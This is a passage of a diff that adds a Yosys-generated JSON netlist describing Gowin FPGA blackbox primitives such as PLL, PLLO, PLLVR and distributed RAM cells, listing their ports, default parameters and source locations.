"c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1174.8-1174.10" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 22 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1174.11-1174.14" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 60, 61, 62, 63, 64, 65, 66, 67, 68 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1177.14-1177.18" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 23 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1174.15-1174.20" + } + }, + "SBI": { + "hide_name": 0, + "bits": [ 33, 34, 35, 36, 37, 38, 39, 40, 41 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1175.17-1175.20" + } + }, + "SBO": { + "hide_name": 0, + "bits": [ 51, 52, 53, 54, 55, 56, 57, 58, 59 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1176.17-1176.20" + } + }, + "SI": { + "hide_name": 0, + "bits": [ 24, 25, 26, 27, 28, 29, 30, 31, 32 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1175.14-1175.16" + } + }, + "SO": { + "hide_name": 0, + "bits": [ 42, 43, 44, 45, 46, 47, 48, 49, 50 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1176.14-1176.16" + } + } + } + }, + "PLL": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1365.1-1404.10" + }, + "parameter_default_values": { + "CLKFB_SEL": "internal", + "CLKOUTD3_SRC": "CLKOUT", + "CLKOUTD_BYPASS": "false", + "CLKOUTD_SRC": "CLKOUT", + "CLKOUTP_BYPASS": "false", + "CLKOUTP_DLY_STEP": "00000000000000000000000000000000", + "CLKOUTP_FT_DIR": "1", + "CLKOUT_BYPASS": "false", + "CLKOUT_DLY_STEP": "00000000000000000000000000000000", + "CLKOUT_FT_DIR": "1", + "DEVICE": "GW1N-4", + "DUTYDA_SEL": "1000 ", + "DYN_DA_EN": "false", + "DYN_FBDIV_SEL": "false", + "DYN_IDIV_SEL": "false", + "DYN_ODIV_SEL": "false", + "DYN_SDIV_SEL": "00000000000000000000000000000010", + "FBDIV_SEL": "00000000000000000000000000000000", + "FCLKIN": "100.0", + "IDIV_SEL": "00000000000000000000000000000000", + "ODIV_SEL": "00000000000000000000000000001000", + "PSDA_SEL": "0000 " + }, + "ports": { + "CLKIN": { + "direction": "input", + "bits": [ 2 ] + }, + "CLKFB": { + "direction": "input", + "bits": [ 3 ] + }, + "RESET": { + "direction": "input", + "bits": [ 4 ] + }, + "RESET_P": { + "direction": "input", + "bits": [ 5 ] + }, + "RESET_I": { + "direction": "input", + "bits": [ 6 ] + }, + "RESET_S": { + "direction": "input", + "bits": [ 7 ] + }, + "FBDSEL": { + "direction": "input", + "bits": [ 8, 9, 10, 11, 12, 13 ] + }, + "IDSEL": { + "direction": "input", + "bits": [ 14, 15, 16, 17, 18, 19 ] + }, + "ODSEL": { + "direction": "input", + "bits": [ 20, 21, 22, 23, 24, 25 ] + }, + "PSDA": { + "direction": "input", + "bits": [ 26, 27, 28, 29 ] + }, + "FDLY": { + "direction": "input", + "bits": [ 30, 31, 32, 33 ] + }, + "DUTYDA": { + "direction": "input", + "bits": [ 34, 35, 36, 37 ] + }, + "CLKOUT": { + "direction": "output", + "bits": [ 38 ] + }, + "LOCK": { + "direction": "output", + "bits": [ 39 ] + }, + "CLKOUTP": { + "direction": "output", + "bits": [ 40 ] + }, + "CLKOUTD": { + "direction": "output", + "bits": [ 41 ] + }, + "CLKOUTD3": { + "direction": "output", + "bits": [ 42 ] + } + }, + "cells": { + }, + "netnames": { + "CLKFB": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1367.7-1367.12" + } + }, + "CLKIN": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1366.7-1366.12" + } + }, + "CLKOUT": { + "hide_name": 0, + "bits": [ 38 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1377.8-1377.14" + } + }, + "CLKOUTD": { + "hide_name": 0, + "bits": [ 41 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1380.8-1380.15" + } + }, + "CLKOUTD3": { + "hide_name": 0, + "bits": [ 42 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1381.8-1381.16" + } + }, + "CLKOUTP": { + "hide_name": 0, + "bits": [ 40 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1379.8-1379.15" + } + }, + "DUTYDA": { + "hide_name": 0, + "bits": [ 34, 35, 36, 37 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1376.13-1376.19" + } + }, + "FBDSEL": { + "hide_name": 0, + "bits": [ 8, 9, 10, 11, 12, 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1372.13-1372.19" + } + }, + "FDLY": { + "hide_name": 0, + "bits": [ 30, 31, 32, 33 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1375.18-1375.22" + } + }, + "IDSEL": { + "hide_name": 0, + "bits": [ 14, 15, 16, 17, 18, 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1373.13-1373.18" + } + }, + "LOCK": { + "hide_name": 0, + "bits": [ 39 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1378.8-1378.12" + } + }, + "ODSEL": { + "hide_name": 0, + "bits": [ 20, 21, 22, 23, 24, 25 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1374.13-1374.18" + } + }, + "PSDA": { + "hide_name": 0, + "bits": [ 26, 27, 28, 29 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1375.13-1375.17" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1368.7-1368.12" + } + }, + "RESET_I": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1370.7-1370.14" + } + }, + "RESET_P": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1369.7-1369.14" + } + }, + "RESET_S": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1371.7-1371.14" + } + } + } + }, + "PLLO": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1832.1-1912.10" + }, + "parameter_default_values": { + "CLKA_IN_SEL": "00", + "CLKA_OUT_SEL": "0", + "CLKB_IN_SEL": "00", + "CLKB_OUT_SEL": "0", + "CLKC_IN_SEL": "00", + "CLKC_OUT_SEL": "0", + "CLKD_IN_SEL": "00", + "CLKD_OUT_SEL": "0", + "CLKFB_SEL": "INTERNAL", + "CLKOUTA_DT_DIR": "1", + "CLKOUTA_DT_STEP": "00000000000000000000000000000000", + "CLKOUTA_EN": "TRUE", + "CLKOUTB_DT_DIR": "1", + "CLKOUTB_DT_STEP": "00000000000000000000000000000000", + "CLKOUTB_EN": "TRUE", + "CLKOUTC_EN": "TRUE", + "CLKOUTD_EN": "TRUE", + "DTMS_ENB": "FALSE", + "DTMS_ENC": "FALSE", + "DTMS_END": "FALSE", + "DYN_DPA_EN": "FALSE", + "DYN_DTA_SEL": "FALSE", + "DYN_DTB_SEL": "FALSE", + "DYN_FBDIV_SEL": "FALSE", + "DYN_ICP_SEL": "FALSE", + "DYN_IDIV_SEL": "FALSE", + "DYN_ODIVA_SEL": "FALSE", + "DYN_ODIVB_SEL": "FALSE", + "DYN_ODIVC_SEL": "FALSE", + "DYN_ODIVD_SEL": "FALSE", + "DYN_PSB_SEL": "FALSE", + "DYN_PSC_SEL": "FALSE", + "DYN_PSD_SEL": "FALSE", + "DYN_RES_SEL": "FALSE", + "FBDIV_SEL": "00000000000000000000000000000000", + "FCLKIN": "100.0", + "ICP_SEL": "xxxxx", + "IDIV_SEL": "00000000000000000000000000000000", + "LPR_REF": "xxxxxxx", + "ODIVA_SEL": "00000000000000000000000000000110", + "ODIVB_SEL": "00000000000000000000000000000110", + "ODIVC_SEL": "00000000000000000000000000000110", + "ODIVD_SEL": "00000000000000000000000000000110", + "PSB_COARSE": "00000000000000000000000000000001", + "PSB_FINE": "00000000000000000000000000000000", + "PSC_COARSE": "00000000000000000000000000000001", + "PSC_FINE": "00000000000000000000000000000000", + "PSD_COARSE": "00000000000000000000000000000001", + "PSD_FINE": "00000000000000000000000000000000", + "RESET_I_EN": "FALSE", + "RESET_S_EN": "FALSE" + }, + "ports": { + "CLKIN": { + "direction": "input", + "bits": [ 2 ] + }, + "CLKFB": { + "direction": "input", + "bits": [ 3 ] + }, + "RESET": { + "direction": "input", + "bits": [ 4 ] + }, + "RESET_P": { + "direction": "input", + "bits": [ 5 ] + }, + "RESET_I": { + "direction": "input", + "bits": [ 6 ] + }, + "RESET_S": { + "direction": "input", + "bits": [ 7 ] + }, + "FBDSEL": { + "direction": "input", + "bits": [ 8, 9, 10, 11, 12, 13 ] + }, + "IDSEL": { + "direction": "input", + "bits": [ 14, 15, 16, 17, 18, 19 ] + }, + "ODSELA": { + "direction": "input", + "bits": [ 20, 21, 22, 23, 24, 25, 26 ] + }, + "ODSELB": { + "direction": "input", + "bits": [ 27, 28, 29, 30, 31, 32, 33 ] + }, + "ODSELC": { + "direction": "input", + "bits": [ 34, 35, 36, 37, 38, 39, 40 ] + }, + "ODSELD": { + "direction": "input", + "bits": [ 41, 42, 43, 44, 45, 46, 47 ] + }, + "DTA": { + "direction": "input", + "bits": [ 48, 49, 50, 51 ] + }, + "DTB": { + "direction": "input", + "bits": [ 52, 53, 54, 55 ] + }, + "ICPSEL": { + "direction": "input", + "bits": [ 56, 57, 58, 59, 60 ] + }, + "LPFRES": { + "direction": "input", + "bits": [ 61, 62, 63 ] + }, + "PSSEL": { + "direction": "input", + "bits": [ 64, 65 ] + }, + "PSDIR": { + "direction": "input", + "bits": [ 66 ] + }, + "PSPULSE": { + "direction": "input", + "bits": [ 67 ] + }, + "ENCLKA": { + "direction": "input", + "bits": [ 68 ] + }, + "ENCLKB": { + "direction": "input", + "bits": [ 69 ] + }, + "ENCLKC": { + "direction": "input", + "bits": [ 70 ] + }, + "ENCLKD": { + "direction": "input", + "bits": [ 71 ] + }, + "LOCK": { + "direction": "output", + "bits": [ 72 ] + }, + "CLKOUTA": { + "direction": "output", + "bits": [ 73 ] + }, + "CLKOUTB": { + "direction": "output", + "bits": [ 74 ] + }, + "CLKOUTC": { + "direction": "output", + "bits": [ 75 ] + }, + "CLKOUTD": { + "direction": "output", + "bits": [ 76 ] + } + }, + "cells": { + }, + "netnames": { + "CLKFB": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1834.7-1834.12" + } + }, + "CLKIN": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1833.7-1833.12" + } + }, + "CLKOUTA": { + "hide_name": 0, + "bits": [ 73 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1857.8-1857.15" + } + }, + "CLKOUTB": { + "hide_name": 0, + "bits": [ 74 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1858.8-1858.15" + } + }, + "CLKOUTC": { + "hide_name": 0, + "bits": [ 75 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1859.8-1859.15" + } + }, + "CLKOUTD": { + "hide_name": 0, + "bits": [ 76 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1860.8-1860.15" + } + }, + "DTA": { + "hide_name": 0, + "bits": [ 48, 49, 50, 51 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1845.13-1845.16" + } + }, + "DTB": { + "hide_name": 0, + "bits": [ 52, 53, 54, 55 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1846.13-1846.16" + } + }, + "ENCLKA": { + "hide_name": 0, + "bits": [ 68 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1852.7-1852.13" + } + }, + "ENCLKB": { + "hide_name": 0, + "bits": [ 69 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1853.7-1853.13" + } + }, + "ENCLKC": { + "hide_name": 0, + "bits": [ 70 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1854.7-1854.13" + } + }, + "ENCLKD": { + "hide_name": 0, + "bits": [ 71 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1855.7-1855.13" + } + }, + "FBDSEL": { + "hide_name": 0, + "bits": [ 8, 9, 10, 11, 12, 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1839.13-1839.19" + } + }, + "ICPSEL": { + "hide_name": 0, + "bits": [ 56, 57, 58, 59, 60 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1847.13-1847.19" + } + }, + "IDSEL": { + "hide_name": 0, + "bits": [ 14, 15, 16, 17, 18, 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1840.13-1840.18" + } + }, + "LOCK": { + "hide_name": 0, + "bits": [ 72 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1856.8-1856.12" + } + }, + "LPFRES": { + "hide_name": 0, + "bits": [ 61, 62, 63 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1848.13-1848.19" + } + }, + "ODSELA": { + "hide_name": 0, + "bits": [ 20, 21, 22, 23, 24, 25, 26 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1841.13-1841.19" + } + }, + "ODSELB": { + "hide_name": 0, + "bits": [ 27, 28, 29, 30, 31, 32, 33 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1842.13-1842.19" + } + }, + "ODSELC": { + "hide_name": 0, + "bits": [ 34, 35, 36, 37, 38, 39, 40 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1843.13-1843.19" + } + }, + "ODSELD": { + "hide_name": 0, + "bits": [ 41, 42, 43, 44, 45, 46, 47 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1844.13-1844.19" + } + }, + "PSDIR": { + "hide_name": 0, + "bits": [ 66 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1850.7-1850.12" + } + }, + "PSPULSE": { + "hide_name": 0, + "bits": [ 67 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1851.7-1851.14" + } + }, + "PSSEL": { + "hide_name": 0, + "bits": [ 64, 65 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1849.13-1849.18" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1835.7-1835.12" + } + }, + "RESET_I": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1837.7-1837.14" + } + }, + "RESET_P": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1836.7-1836.14" + } + }, + "RESET_S": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1838.7-1838.14" + } + } + } + }, + "PLLVR": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1864.1-1908.10" + }, + "parameter_default_values": { + "CLKFB_SEL": "internal", + "CLKOUTD3_SRC": "CLKOUT", + "CLKOUTD_BYPASS": "false", + "CLKOUTD_SRC": "CLKOUT", + "CLKOUTP_BYPASS": "false", + "CLKOUTP_DLY_STEP": "00000000000000000000000000000000", + "CLKOUTP_FT_DIR": "1", + "CLKOUT_BYPASS": "false", + "CLKOUT_DLY_STEP": "00000000000000000000000000000000", + "CLKOUT_FT_DIR": "1", + "DEVICE": "GW1NS-4", + "DUTYDA_SEL": "1000 ", + "DYN_DA_EN": "false", + "DYN_FBDIV_SEL": "false", + "DYN_IDIV_SEL": "false", + "DYN_ODIV_SEL": "false", + "DYN_SDIV_SEL": "00000000000000000000000000000010", + "FBDIV_SEL": "00000000000000000000000000000000", + "FCLKIN": "100.0", + "IDIV_SEL": "00000000000000000000000000000000", + "ODIV_SEL": "00000000000000000000000000001000", + "PSDA_SEL": "0000 " + }, + "ports": { + "CLKOUT": { + "direction": "output", + "bits": [ 2 ] + }, + "CLKOUTP": { + "direction": "output", + "bits": [ 3 ] + }, + "CLKOUTD": { + "direction": "output", + "bits": [ 4 ] + }, + "CLKOUTD3": { + "direction": "output", + "bits": [ 5 ] + }, + "LOCK": { + "direction": "output", + "bits": [ 6 ] + }, + "CLKIN": { + "direction": "input", + "bits": [ 7 ] + }, + "CLKFB": { + "direction": "input", + "bits": [ 8 ] + }, + "FBDSEL": { + "direction": "input", + "bits": [ 9, 10, 11, 12, 13, 14 ] + }, + "IDSEL": { + "direction": "input", + "bits": [ 15, 16, 17, 18, 19, 20 ] + }, + "ODSEL": { + "direction": "input", + "bits": [ 21, 22, 23, 24, 25, 26 ] + }, + "DUTYDA": { + "direction": "input", + "bits": [ 27, 28, 29, 30 ] + }, + "PSDA": { + "direction": "input", + "bits": [ 31, 32, 33, 34 ] + }, + "FDLY": { + "direction": "input", + "bits": [ 35, 36, 37, 38 ] + }, + "RESET": { + "direction": "input", + "bits": [ 39 ] + }, + "RESET_P": { + "direction": "input", + "bits": [ 40 ] + }, + "VREN": { + "direction": "input", + "bits": [ 41 ] + } + }, + "cells": { + }, + "netnames": { + "CLKFB": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1866.7-1866.12" + } + }, + "CLKIN": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1865.7-1865.12" + } + }, + "CLKOUT": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1876.8-1876.14" + } + }, + "CLKOUTD": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1879.8-1879.15" + } + }, + "CLKOUTD3": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1880.8-1880.16" + } + }, + "CLKOUTP": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1878.8-1878.15" + } + }, + "DUTYDA": { + "hide_name": 0, + "bits": [ 27, 28, 29, 30 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1873.13-1873.19" + } + }, + "FBDSEL": { + "hide_name": 0, + "bits": [ 9, 10, 11, 12, 13, 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1869.13-1869.19" + } + }, + "FDLY": { + "hide_name": 0, + "bits": [ 35, 36, 37, 38 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1872.18-1872.22" + } + }, + "IDSEL": { + "hide_name": 0, + "bits": [ 15, 16, 17, 18, 19, 20 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1870.13-1870.18" + } + }, + "LOCK": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1877.8-1877.12" + } + }, + "ODSEL": { + "hide_name": 0, + "bits": [ 21, 22, 23, 24, 25, 26 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1871.13-1871.18" + } + }, + "PSDA": { + "hide_name": 0, + "bits": [ 31, 32, 33, 34 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1872.13-1872.17" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 39 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1867.7-1867.12" + } + }, + "RESET_P": { + "hide_name": 0, + "bits": [ 40 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1868.7-1868.14" + } + }, + "VREN": { + "hide_name": 0, + "bits": [ 41 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1874.7-1874.11" + } + } + } + }, + "RAM16S1": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "abc9_flop": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1017.1-1049.10" + }, + "parameter_default_values": { + "INIT_0": "0000000000000000" + }, + "ports": { + "DO": { + "direction": "output", + "bits": [ 2 ] + }, + "DI": { + "direction": "input", + "bits": [ 3 ] + }, + "AD": { + "direction": "input", + "bits": [ 4, 5, 6, 7 ] + }, + "WRE": { + "direction": "input", + "bits": [ 8 ] + }, + "CLK": { + "direction": "input", + "bits": [ 9 ] + } + }, + "cells": { + }, + "netnames": { + "AD": { + "hide_name": 0, + "bits": [ 4, 5, 6, 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1021.13-1021.15" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1024.7-1024.10" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1022.7-1022.9" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1023.8-1023.10" + } + }, + "WRE": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1025.7-1025.10" + } + } + } + }, + "RAM16S2": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "abc9_flop": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1052.1-1088.10" + }, + "parameter_default_values": { + "INIT_0": "0000000000000000", + "INIT_1": "0000000000000000" + }, + "ports": { + "DO": { + "direction": "output", + "bits": [ 2, 3 ] + }, + "DI": { + "direction": "input", + "bits": [ 4, 5 ] + }, + "AD": { + "direction": "input", + "bits": [ 6, 7, 8, 9 ] + }, + "WRE": { + "direction": "input", + "bits": [ 10 ] + }, + "CLK": { + "direction": "input", + "bits": [ 11 ] + } + }, + "cells": { + }, + "netnames": { + "AD": { + "hide_name": 0, + "bits": [ 6, 7, 8, 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1057.13-1057.15" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1060.7-1060.10" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 4, 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1058.13-1058.15" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 2, 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1059.14-1059.16" + } + }, + "WRE": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1061.7-1061.10" + } + } + } + }, + "RAM16S4": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "abc9_flop": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1091.1-1135.10" + }, + "parameter_default_values": { + "INIT_0": "0000000000000000", + "INIT_1": "0000000000000000", + "INIT_2": "0000000000000000", + "INIT_3": "0000000000000000" + }, + "ports": { + "DO": { + "direction": "output", + "bits": [ 2, 3, 4, 5 ] + }, + "DI": { + "direction": "input", + "bits": [ 6, 7, 8, 9 ] + }, + "AD": { + "direction": "input", + "bits": [ 10, 11, 12, 13 ] + }, + "WRE": { + "direction": "input", + "bits": [ 14 ] + }, + "CLK": { + "direction": "input", + "bits": [ 15 ] + } + }, + "cells": { + }, + "netnames": { + "AD": { + "hide_name": 0, + "bits": [ 10, 11, 12, 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1098.13-1098.15" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1101.7-1101.10" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 6, 7, 8, 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1099.13-1099.15" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1100.14-1100.16" + } + }, + "WRE": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1102.7-1102.10" + } + } + } + }, + "RAM16SDP1": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1138.1-1171.10" + }, + "parameter_default_values": { + "INIT_0": "0000000000000000" + }, + "ports": { + "DO": { + "direction": "output", + "bits": [ 2 ] + }, + "DI": { + "direction": "input", + "bits": [ 3 ] + }, + "WAD": { + "direction": "input", + "bits": [ 4, 5, 6, 7 ] + }, + "RAD": { + "direction": "input", + "bits": [ 8, 9, 10, 11 ] + }, + "WRE": { + "direction": "input", + "bits": [ 12 ] + }, + "CLK": { + "direction": "input", + "bits": [ 13 ] + } + }, + "cells": { + "$specify$166": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "1", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000100", + "T_FALL_MAX": "00000000000000000000000110010101", + "T_FALL_MIN": "00000000000000000000000110010101", + "T_FALL_TYP": "00000000000000000000000110010101", + "T_RISE_MAX": "00000000000000000000000100001110", + "T_RISE_MIN": "00000000000000000000000100001110", + "T_RISE_TYP": "00000000000000000000000100001110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1150.2-1150.27" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 